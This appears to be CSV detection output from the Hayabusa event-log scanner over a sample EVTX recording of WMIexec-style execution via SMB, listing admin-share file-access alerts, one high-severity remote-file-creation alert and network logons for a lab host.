10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\MSBuild\5eda447ab5fd1d3ae7ccfa140388c8b0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\a20cafac04a2e9b3bcb5ec4d674775e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napcrypt\c97155692ee6bc8729624e1a8f6371c1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\naphlpr\8d352c21be1bcfb356df6fec4b6281ec : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.193 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napinit\d39a7c06edcf81bed4470b0a8a5f4bb7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 